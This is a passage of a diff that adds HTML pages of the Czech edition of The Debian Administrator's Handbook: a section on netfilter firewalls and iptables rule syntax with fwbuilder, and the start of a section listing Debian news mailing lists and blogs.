+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">14.2. Firewall or Packet Filtering</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Firewall, Netfilter, IDS/NIDS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="security.html"
+        title="Kapitola 14. Security" /><link
+        rel="prev"
+        href="security.html"
+        title="Kapitola 14. Security" /><link
+        rel="next"
+        href="sect.supervision.html"
+        title="14.3. Supervision: Prevention, Detection, Deterrence" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.firewall-packet-filtering.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="security.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.supervision.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.firewall-packet-filtering"></a>14.2. Firewall or Packet Filtering</h2></div></div></div><a
+          id="id-1.17.5.2"
+          class="indexterm"></a><a
+          id="id-1.17.5.3"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Firewall</strong></p></div></div></div><a
+            id="id-1.17.5.4.2"
+            class="indexterm"></a><div
+            class="para">
+			A <span
+              class="emphasis"><em>firewall</em></span> is a piece of computer equipment with hardware and/or software that sorts the incoming or outgoing network packets (coming to or from a local network) and only lets through those matching certain predefined conditions.
+		</div></div><div
+          class="para">
+			A firewall is a filtering network gateway and is only effective on packets that must go through it. Therefore, it can only be effective when going through the firewall is the only route for these packets.
+		</div><div
+          class="para">
+			The lack of a standard configuration (and the “process, not product” motto) explains the lack of a turn-key solution. There are, however, tools that make it simpler to configure the <span
+            class="emphasis"><em>netfilter</em></span> firewall, with a graphical representation of the filtering rules. <code
+            class="command">fwbuilder</code> is undoubtedly among the best of them.
+		</div><a
+          id="id-1.17.5.7"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>SPECIFIC CASE</em></span> Local Firewall</strong></p></div></div></div><div
+            class="para">
+			A firewall can be restricted to one particular machine (as opposed to a complete network), in which case its role is to filter or limit access to some services, or possibly to prevent outgoing connections by rogue software that a user could, willingly or not, have installed.
+		</div></div><div
+          class="para">
+			The Linux kernel embeds the <span
+            class="emphasis"><em>netfilter</em></span> firewall. It can be controlled from user space with the <code
+            class="command">iptables</code> and <code
+            class="command">ip6tables</code> commands. The difference between these two commands is that the former acts on the IPv4 network, whereas the latter acts on IPv6. Since both network protocol stacks will probably be around for many years, both tools will need to be used in parallel.
+		</div><a
+          id="id-1.17.5.10"
+          class="indexterm"></a><a
+          id="id-1.17.5.11"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.netfilter"></a>14.2.1. Netfilter Behavior</h3></div></div></div><div
+            class="para">
+				<span
+              class="emphasis"><em>netfilter</em></span> uses four distinct tables which store rules regulating three kinds of operations on packets:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">filter</code> concerns filtering rules (accepting, refusing or ignoring a packet);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">nat</code> concerns translation of source or destination addresses and ports of packages;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">mangle</code> concerns other changes to the IP packets (including the ToS — <span
+                    class="emphasis"><em>Type of Service</em></span> — field and options);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">raw</code> allows other manual modifications on packets before they reach the connection tracking system.
+					</div></li></ul></div><div
+            class="para">
+				Each table contains lists of rules called <span
+              class="emphasis"><em>chains</em></span>. The firewall uses standard chains to handle packets based on predefined circumstances. The administrator can create other chains, which will only be used when referred to by one of the standard chains (either directly or indirectly).
+			</div><a
+            id="id-1.17.5.12.5"
+            class="indexterm"></a><a
+            id="id-1.17.5.12.6"
+            class="indexterm"></a><div
+            class="para">
+				The <code
+              class="literal">filter</code> table has three standard chains:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">INPUT</code>: concerns packets whose destination is the firewall itself;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">OUTPUT</code>: concerns packets emitted by the firewall;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">FORWARD</code>: concerns packets transiting through the firewall (which is neither their source nor their destination).
+					</div></li></ul></div><div
+            class="para">
+				The <code
+              class="literal">nat</code> table also has three standard chains:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">PREROUTING</code>: to modify packets as soon as they arrive;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">POSTROUTING</code>: to modify packets when they are ready to go on their way;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">OUTPUT</code>: to modify packets generated by the firewall itself.
+					</div></li></ul></div><div
+            class="figure"><a
+              xmlns=""
+              id="figure.chaines-netfilter"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/netfilter.png"
+                  alt="How netfilter chains are called" /></div></div><p
+              class="title"><strong>Obrázek 14.1. How <span
+                  class="emphasis"><em>netfilter</em></span> chains are called</strong></p></div><div
+            class="para">
+				Each chain is a list of rules; each rule is a set of conditions and an action to execute when the conditions are met. When processing a packet, the firewall scans the appropriate chain, one rule after another; when the conditions for one rule are met, it “jumps” (hence the <code
+              class="literal">-j</code> option in the commands) to the specified action to continue processing. The most common behaviors are standardized, and dedicated actions exist for them. Taking one of these standard actions interrupts the processing of the chain, since the packet's fate is already sealed (barring an exception mentioned below):
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> ICMP</strong></p></div></div></div><div
+              class="para">
+				ICMP (<span
+                class="emphasis"><em>Internet Control Message </em></span>Protocol) is the protocol used to transmit complementary information on communications. It allows testing network connectivity with the <code
+                class="command">ping</code> command (which sends an ICMP <span
+                class="emphasis"><em>echo request</em></span> message, which the recipient is meant to answer with an ICMP <span
+                class="emphasis"><em>echo reply</em></span> message). It signals a firewall rejecting a packet, indicates an overflow in a receive buffer, proposes a better route for the next packets in the connection, and so on. This protocol is defined by several RFC documents; the initial RFC777 and RFC792 were soon completed and extended. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.faqs.org/rfcs/rfc777.html">http://www.faqs.org/rfcs/rfc777.html</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.faqs.org/rfcs/rfc792.html">http://www.faqs.org/rfcs/rfc792.html</a></div>
+			</div><div
+              class="para">
+				For reference, a receive buffer is a small memory zone storing data between the time it arrives from the network and the time the kernel handles it. If this zone is full, new data cannot be received, and ICMP signals the problem, so that the emitter can slow down its transfer rate (which should ideally reach an equilibrium after some time).
+			</div><a
+              id="id-1.17.5.12.13.4"
+              class="indexterm"></a><a
+              id="id-1.17.5.12.13.5"
+              class="indexterm"></a><a
+              id="id-1.17.5.12.13.6"
+              class="indexterm"></a><a
+              id="id-1.17.5.12.13.7"
+              class="indexterm"></a><a
+              id="id-1.17.5.12.13.8"
+              class="indexterm"></a><div
+              class="para">
+				Note that although an IPv4 network can work without ICMP, ICMPv6 is strictly required for an IPv6 network, since it combines several functions that were, in the IPv4 world, spread across ICMPv4, IGMP (<span
+                class="emphasis"><em>Internet Group Membership Protocol</em></span>) and ARP (<span
+                class="emphasis"><em>Address Resolution Protocol</em></span>). ICMPv6 is defined in RFC4443. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.faqs.org/rfcs/rfc4443.html">http://www.faqs.org/rfcs/rfc4443.html</a></div>
+			</div></div><div
+            class="para">
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">ACCEPT</code>: allow the packet to go on its way;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">REJECT</code>: reject the packet with an ICMP error packet (the <code
+                    class="literal">--reject-with <em
+                      class="replaceable">type</em></code> option to <code
+                    class="command">iptables</code> allows selecting the type of error);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">DROP</code>: delete (ignore) the packet;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">LOG</code>: log (via <code
+                    class="command">syslogd</code>) a message with a description of the packet; note that this action does not interrupt processing, and the execution of the chain continues at the next rule, which is why logging refused packets requires both a LOG and a REJECT/DROP rule;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">ULOG</code>: log a message via <code
+                    class="command">ulogd</code>, which can be better adapted and more efficient than <code
+                    class="command">syslogd</code> for handling large numbers of messages; note that this action, like LOG, also returns processing to the next rule in the calling chain;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<em
+                    class="replaceable">chain_name</em>: jump to the given chain and evaluate its rules;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">RETURN</code>: interrupt processing of the current chain, and return to the calling chain; in case the current chain is a standard one, there's no calling chain, so the default action (defined with the <code
+                    class="literal">-P</code> option to <code
+                    class="command">iptables</code>) is executed instead;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">SNAT</code> (only in the <code
+                    class="literal">nat</code> table): apply <span
+                    class="emphasis"><em>Source NAT</em></span> (extra options describe the exact changes to apply);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">DNAT</code> (only in the <code
+                    class="literal">nat</code> table): apply <span
+                    class="emphasis"><em>Destination NAT</em></span> (extra options describe the exact changes to apply);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">MASQUERADE</code> (only in the <code
+                    class="literal">nat</code> table): apply <span
+                    class="emphasis"><em>masquerading</em></span> (a special case of <span
+                    class="emphasis"><em>Source NAT</em></span>);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">REDIRECT</code> (only in the <code
+                    class="literal">nat</code> table): redirect a packet to a given port of the firewall itself; this can be used to set up a transparent web proxy that works with no configuration on the client side, since the client thinks it connects to the recipient whereas the communications actually go through the proxy.
+					</div></li></ul></div><div
+            class="para">
+				Other actions, particularly those concerning the <code
+              class="literal">mangle</code> table, are outside the scope of this text. The <span
+              class="citerefentry"><span
+                class="refentrytitle">iptables</span>(8)</span> and <span
+              class="citerefentry"><span
+                class="refentrytitle">ip6tables</span>(8)</span> have a comprehensive list.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.iptables"></a>14.2.2. Syntax of <code
+                    class="command">iptables</code> and <code
+                    class="command">ip6tables</code></h3></div></div></div><div
+            class="para">
+				The <code
+              class="command">iptables</code> and <code
+              class="command">ip6tables</code> commands allow manipulating tables, chains and rules. Their <code
+              class="literal">-t <em
+                class="replaceable">table</em></code> option indicates which table to operate on (by default, <code
+              class="literal">filter</code>).
+			</div><a
+            id="id-1.17.5.13.3"
+            class="indexterm"></a><a
+            id="id-1.17.5.13.4"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.iptables-command"></a>14.2.2.1. Commands</h4></div></div></div><div
+              class="para">
+					The <code
+                class="literal">-N <em
+                  class="replaceable">chain</em></code> option creates a new chain. The <code
+                class="literal">-X <em
+                  class="replaceable">chain</em></code> deletes an empty and unused chain. The <code
+                class="literal">-A <em
+                  class="replaceable">chain</em> <em
+                  class="replaceable">rule</em></code> adds a rule at the end of the given chain. The <code
+                class="literal">-I <em
+                  class="replaceable">chain</em> <em
+                  class="replaceable">rule_num</em> <em
+                  class="replaceable">rule</em></code> option inserts a rule before the rule number <em
+                class="replaceable">rule_num</em>. The <code
+                class="literal">-D <em
+                  class="replaceable">chain</em> <em
+                  class="replaceable">rule_num</em></code> (or <code
+                class="literal">-D <em
+                  class="replaceable">chain</em> <em
+                  class="replaceable">rule</em></code>) option deletes a rule in a chain; the first syntax identifies the rule to be deleted by its number, while the latter identifies it by its contents. The <code
+                class="literal">-F <em
+                  class="replaceable">chain</em></code> option flushes a chain (deletes all its rules); if no chain is mentioned, all the rules in the table are deleted. The <code
+                class="literal">-L <em
+                  class="replaceable">chain</em></code> option lists the rules in the chain. Finally, the <code
+                class="literal">-P <em
+                  class="replaceable">chain</em> <em
+                  class="replaceable">action</em></code> option defines the default action, or “policy”, for a given chain; note that only standard chains can have such a policy.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.iptables-rules"></a>14.2.2.2. Rules</h4></div></div></div><a
+              id="id-1.17.5.13.6.2"
+              class="indexterm"></a><div
+              class="para">
+					Each rule is expressed as <code
+                class="literal"><em
+                  class="replaceable">conditions</em> -j <em
+                  class="replaceable">action</em> <em
+                  class="replaceable">action_options</em></code>. If several conditions are described in the same rule, then the criterion is the conjunction (logical <span
+                class="emphasis"><em>and</em></span>) of the conditions, which is at least as restrictive as each individual condition.
+				</div><div
+              class="para">
+					The <code
+                class="literal">-p <em
+                  class="replaceable">protocol</em></code> condition matches the protocol field of the IP packet. The most common values are <code
+                class="literal">tcp</code>, <code
+                class="literal">udp</code>, <code
+                class="literal">icmp</code>, and <code
+                class="literal">icmpv6</code>. Prefixing the condition with an exclamation mark negates the condition, which then becomes a match for “any packets with a different protocol than the specified one”. This negation mechanism is not specific to the <code
+                class="literal">-p</code> option and it can be applied to all other conditions too.
+				</div><div
+              class="para">
+					The <code
+                class="literal">-s <em
+                  class="replaceable">address</em></code> or <code
+                class="literal">-s <em
+                  class="replaceable">network/mask</em></code> condition matches the source address of the packet. Correspondingly, <code
+                class="literal">-d <em
+                  class="replaceable">address</em></code> or <code
+                class="literal">-d <em
+                  class="replaceable">network/mask</em></code> matches the destination address.
+				</div><div
+              class="para">
+					The <code
+                class="literal">-i <em
+                  class="replaceable">interface</em></code> condition selects packets coming from the given network interface. <code
+                class="literal">-o <em
+                  class="replaceable">interface</em></code> selects packets going out on a specific interface.
+				</div><div
+              class="para">
+					There are more specific conditions, depending on the generic conditions described above. For instance, the <code
+                class="literal">-p tcp</code> condition can be complemented with conditions on the TCP ports, with clauses such as <code
+                class="literal">--source-port <em
+                  class="replaceable">port</em></code> and <code
+                class="literal">--destination-port <em
+                  class="replaceable">port</em></code>.
+				</div><div
+              class="para">
+					The <code
+                class="literal">--state <em
+                  class="replaceable">state</em></code> condition matches the state of a packet in a connection (this requires the <code
+                class="command">ipt_conntrack</code> kernel module, for connection tracking). The <code
+                class="literal">NEW</code> state describes a packet starting a new connection; <code
+                class="literal">ESTABLISHED</code> matches packets belonging to an already existing connection, and <code
+                class="literal">RELATED</code> matches packets initiating a new connection related to an existing one (which is useful for the <code
+                class="literal">ftp-data</code> connections in the “active” mode of the FTP protocol).
+				</div><div
+              class="para">
+					The previous section lists available actions, but not their respective options. The <code
+                class="literal">LOG</code> action, for instance, has the following options:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">--log-level</code>, with default value <code
+                      class="literal">warning</code>, indicates the <code
+                      class="command">syslog</code> severity level;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">--log-prefix</code> allows specifying a text prefix to differentiate between logged messages;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="literal">--log-tcp-sequence</code>, <code
+                      class="literal">--log-tcp-options</code> and <code
+                      class="literal">--log-ip-options</code> indicate extra data to be integrated into the message: respectively, the TCP sequence number, TCP options, and IP options.
+						</div></li></ul></div><div
+              class="para">
+					The <code
+                class="literal">DNAT</code> action provides the <code
+                class="literal">--to-destination <em
+                  class="replaceable">address</em>:<em
+                  class="replaceable">port</em></code> option to indicate the new destination IP address and/or port. Similarly, <code
+                class="literal">SNAT</code> provides <code
+                class="literal">--to-source <em
+                  class="replaceable">address</em>:<em
+                  class="replaceable">port</em></code> to indicate the new source IP address and/or port.
+				</div><div
+              class="para">
+					The <code
+                class="literal">REDIRECT</code> action (only available if NAT is available) provides the <code
+                class="literal">--to-ports <em
+                  class="replaceable">port(s)</em></code> option to indicate the port, or port range, where the packets should be redirected.
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.creating-rules"></a>14.2.3. Creating Rules</h3></div></div></div><div
+            class="para">
+				Each rule creation requires one invocation of <code
+              class="command">iptables</code>/<code
+              class="command">ip6tables</code>. Typing these commands manually can be tedious, so the calls are usually stored in a script so that the same configuration is set up automatically every time the machine boots. This script can be written by hand, but it can also be interesting to prepare it with a high-level tool such as <code
+              class="command">fwbuilder</code>.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>apt install fwbuilder</code></strong></pre><div
+            class="para">
+				The principle is simple. In the first step, one needs to describe all the elements that will be involved in the actual rules:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						the firewall itself, with its network interfaces;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the networks, with their corresponding IP ranges;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the servers;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the ports belonging to the services hosted on the servers.
+					</div></li></ul></div><div
+            class="para">
+				The rules are then created with simple drag-and-drop actions on the objects. A few contextual menus can change the condition (negating it, for instance). Then the action needs to be chosen and configured.
+			</div><div
+            class="para">
+				As far as IPv6 is concerned, one can either create two distinct rulesets for IPv4 and IPv6, or create only one and let <code
+              class="command">fwbuilder</code> translate the rules according to the addresses assigned to the objects.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="figure.fwbuilder"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/fwbuilder.png"
+                  alt="Fwbuilder's main window" /></div></div><p
+              class="title"><strong>Obrázek 14.2. Fwbuilder's main window</strong></p></div><a
+            id="id-1.17.5.14.9"
+            class="indexterm"></a><div
+            class="para">
+				<code
+              class="command">fwbuilder</code> can then generate a script configuring the firewall according to the rules that have been defined. Its modular architecture gives it the ability to generate scripts targeting different systems (<code
+              class="command">iptables</code> for Linux, <code
+              class="command">ipf</code> for FreeBSD and <code
+              class="command">pf</code> for OpenBSD).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-rules-at-boot"></a>14.2.4. Installing the Rules at Each Boot</h3></div></div></div><div
+            class="para">
+				In other cases, the recommended way is to register the configuration script in an <code
+              class="literal">up</code> directive of the <code
+              class="filename">/etc/network/interfaces</code> file. In the following example, the script is stored under <code
+              class="filename">/usr/local/etc/arrakis.fw</code>.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.network-interfaces-firewall"></a><p
+              class="title"><strong>Příklad 14.1. <code
+                  class="filename">interfaces</code> file calling firewall script</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">auto eth0
+iface eth0 inet static
+    address 192.168.0.1
+    network 192.168.0.0
+    netmask 255.255.255.0
+    broadcast 192.168.0.255
+    up /usr/local/etc/arrakis.fw
+</pre></div></div><div
+            class="para">
+				This obviously assumes that you are using <span
+              class="pkg pkg">ifupdown</span> to configure the network interfaces. If you are using something else (like <span
+              class="emphasis"><em>NetworkManager</em></span> or <span
+              class="emphasis"><em>systemd-networkd</em></span>), then refer to their respective documentation to find out ways to execute a script after the interface has been brought up.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="security.html"><strong>Předcházející</strong>Kapitola 14. Security</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.supervision.html"><strong>Další</strong>14.3. Supervision: Prevention, Detection, Deterre...</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.follow-debian-news.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.follow-debian-news.html
new file mode 100644
index 000000000..4dcfb81fa
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.follow-debian-news.html
@@ -0,0 +1,178 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">1.4. Follow Debian News</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Cíl, Prostředky, Operace, Dobrovolník" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="the-debian-project.html"
+        title="Kapitola 1. Projekt Debian" /><link
+        rel="prev"
+        href="sect.debian-internals.html"
+        title="1.3. Vnitřní fungování projektu Debian" /><link
+        rel="next"
+        href="sect.role-of-distributions.html"
+        title="1.5. The Role of Distributions" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.follow-debian-news.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.debian-internals.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.role-of-distributions.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.follow-debian-news"></a>1.4. Follow Debian News</h2></div></div></div><div
+          class="para">
+			As already mentioned, the Debian project evolves in a very distributed, very organic way. As a consequence, it may be difficult at times to stay in touch with what happens within the project without being overwhelmed with a never-ending flood of notifications.
+		</div><div
+          class="para">
+			If you only want the most important news about Debian, you probably should subscribe to the <code
+            class="email"><a
+              class="email"
+              href="mailto:debian-announce@lists.debian.org">debian-announce@lists.debian.org</a></code> list. This is a very low-traffic list (around a dozen messages a year), and only gives the most important announcements, such as the availability of a new stable release, the election of a new Project Leader, or the yearly Debian Conference. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://lists.debian.org/debian-announce/">https://lists.debian.org/debian-announce/</a></div>
+		</div><a
+          id="id-1.4.7.4"
+          class="indexterm"></a><div
+          class="para">
+			More general (and regular) news about Debian are sent to the <code
+            class="email"><a
+              class="email"
+              href="mailto:debian-news@lists.debian.org">debian-news@lists.debian.org</a></code> list. The traffic on this list is quite reasonable too (usually around a handful of messages a month), and it includes the semi-regular “Debian Project News”, which is a compilation of various small bits of information about what happens in the project. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://lists.debian.org/debian-news/">https://lists.debian.org/debian-news/</a></div>
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>COMMUNITY</em></span> The publicity team</strong></p></div></div></div><div
+            class="para">
+			Debian's official communication channels are managed by volunteers of the Debian publicity team. They are delegates of the Debian Project Leader and moderate news and announcements posted there. Many other volunteers contribute to the team, for example by writing articles for “Debian Project News” or by animating the microblogging service (<a
+              href="https://micronews.debian.org/">micronews.debian.org</a>). <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.debian.org/Teams/Publicity">https://wiki.debian.org/Teams/Publicity</a></div>
+		</div></div><div
+          class="para">
+			For more information about the evolution of Debian and what is happening at some point in time in various teams, there's also the <code
+            class="email"><a
+              class="email"
+              href="mailto:debian-devel-announce@lists.debian.org">debian-devel-announce@lists.debian.org</a></code> list. As its name implies, the announcements it carries will probably be more interesting to developers, but it also allows interested parties to keep an eye on what happens in more concrete terms than just when a stable version is released. While <code
+            class="email"><a
+              class="email"
+              href="mailto:debian-announce@lists.debian.org">debian-announce@lists.debian.org</a></code> gives news about the user-visible results, <code
+            class="email"><a
+              class="email"
+              href="mailto:debian-devel-announce@lists.debian.org">debian-devel-announce@lists.debian.org</a></code> gives news about how these results are produced. As a side note, “d-d-a” (as it is sometimes referred to) is the only list that Debian developers must be subscribed to. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://lists.debian.org/debian-devel-announce/">https://lists.debian.org/debian-devel-announce/</a></div>
+		</div><div
+          class="para">
+			Debian's official blog (<a
+            href="https://bits.debian.org">bits.debian.org</a>) is also a good source of information. It conveys most of the interesting news that are published on the various mailing lists that we already covered and other important news contributed by community members. Since all Debian developers can contribute these news when they think they have something noteworthy to make public, Debian's blog gives a valuable insight while staying rather focused on the project as a whole.
+		</div><a
+          id="id-1.4.7.9"
+          class="indexterm"></a><div
+          class="para">
+			A more informal source of information can also be found on Planet Debian, which aggregates articles posted by Debian contributors on their respective blogs. While the contents do not deal exclusively with Debian development, they provide a view into what is happening in the community and what its members are up to. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://planet.debian.org/">https://planet.debian.org/</a></div>
+		</div><a
+          id="id-1.4.7.11"
+          class="indexterm"></a><a
+          id="id-1.4.7.12"
+          class="indexterm"></a><a
+          id="id-1.4.7.13"
+          class="indexterm"></a><a
+          id="id-1.4.7.14"
+          class="indexterm"></a><a
+          id="id-1.4.7.15"
+          class="indexterm"></a><a
+          id="id-1.4.7.16"
+          class="indexterm"></a><a
+          id="id-1.4.7.17"
+          class="indexterm"></a><div
+          class="para">
+			The project is also well represented on social networks. While Debian only has an official presence on platforms built with free software (like the Identi.ca microblogging platform, powered by <span
+            class="emphasis"><em>pump.io</em></span>), there are many Debian contributors who are animating Twitter accounts, Facebook pages, Google+ pages, and more. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://identi.ca/debian">https://identi.ca/debian</a></div> <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://twitter.com/debian">https://twitter.com/debian</a></div> <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://www.facebook.com/debian">https://www.facebook.com/debian</a></div> <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://plus.google.com/111711190057359692089">https://plus.google.com/111711190057359692089</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
